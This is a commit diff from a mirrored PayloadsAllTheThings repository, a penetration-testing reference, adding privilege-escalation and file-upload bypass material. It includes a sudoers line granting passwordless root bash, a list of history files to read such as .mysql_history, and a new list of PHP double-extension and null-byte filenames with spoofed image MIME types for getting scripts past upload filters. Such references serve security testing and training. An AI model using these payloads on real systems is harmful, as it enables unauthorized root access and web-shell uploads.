mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-05 11:05:29 +00:00
PrivEsc - sudoers + Upload PHP
This commit is contained in:
parent
3ca07aeb7a
commit
2b1900e046
@ -244,3 +244,4 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
|
|||||||
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
|
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
|
||||||
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
|
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
|
||||||
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
|
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
|
||||||
|
* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
|
@ -250,7 +250,7 @@ Secret is "Sn1f"
|
|||||||
|
|
||||||
### Hashcat
|
### Hashcat
|
||||||
|
|
||||||
> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065)
|
> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065)
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
/hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
|
/hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
|
||||||
|
@ -84,7 +84,7 @@
|
|||||||
* Checks if password hashes are stored in /etc/passwd
|
* Checks if password hashes are stored in /etc/passwd
|
||||||
* Extract full details for 'default' uid's such as 0, 1000, 1001 etc
|
* Extract full details for 'default' uid's such as 0, 1000, 1001 etc
|
||||||
* Attempt to read restricted files i.e. /etc/shadow
|
* Attempt to read restricted files i.e. /etc/shadow
|
||||||
* List current users history files (i.e .bash_history, .nano_history etc.)
|
* List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.)
|
||||||
* Basic SSH checks
|
* Basic SSH checks
|
||||||
* Privileged access:
|
* Privileged access:
|
||||||
* Which users have recently used sudo
|
* Which users have recently used sudo
|
||||||
@ -455,9 +455,9 @@ echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
|
|||||||
|
|
||||||
# use SUDO without password
|
# use SUDO without password
|
||||||
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
|
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
|
||||||
|
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## NFS Root Squashing
|
## NFS Root Squashing
|
||||||
|
|
||||||
When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
|
When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
|
||||||
@ -620,7 +620,7 @@ Precompiled exploits can be found inside these repositories, run them at your ow
|
|||||||
* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
|
* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
|
||||||
* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
|
* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
|
||||||
|
|
||||||
The following exploits are known to work well.
|
The following exploits are known to work well, search for another exploits using `searchsploit -w linux kernel centos`.
|
||||||
|
|
||||||
### CVE-2016-5195 (DirtyCow)
|
### CVE-2016-5195 (DirtyCow)
|
||||||
|
|
||||||
|
20
Upload Insecure Files/Extension PHP/extensions.lst
Normal file
20
Upload Insecure Files/Extension PHP/extensions.lst
Normal file
@ -0,0 +1,20 @@
|
|||||||
|
.jpeg.php
|
||||||
|
.jpg.php
|
||||||
|
.png.php
|
||||||
|
.php
|
||||||
|
.php3
|
||||||
|
.php4
|
||||||
|
.php5
|
||||||
|
.php7
|
||||||
|
.pht
|
||||||
|
.phar
|
||||||
|
.phpt
|
||||||
|
.pgif
|
||||||
|
.phtml
|
||||||
|
.phtm
|
||||||
|
.php%00.gif
|
||||||
|
.php\x00.gif
|
||||||
|
.php%00.png
|
||||||
|
.php\x00.png
|
||||||
|
.php%00.jpg
|
||||||
|
.php\x00.jpg
|
@ -54,8 +54,17 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
|
|||||||
|
|
||||||
### Upload tricks
|
### Upload tricks
|
||||||
|
|
||||||
- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()`
|
- Null byte (works well against `pathinfo()`)
|
||||||
|
* .php%00.gif
|
||||||
|
* .php\x00.gif
|
||||||
|
* .php%00.png
|
||||||
|
* .php\x00.png
|
||||||
|
* .php%00.jpg
|
||||||
|
* .php\x00.jpg
|
||||||
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
||||||
|
* `Content-Type : image/gif`
|
||||||
|
* `Content-Type : image/png`
|
||||||
|
* `Content-Type : image/jpeg`
|
||||||
|
|
||||||
### Picture upload with LFI
|
### Picture upload with LFI
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user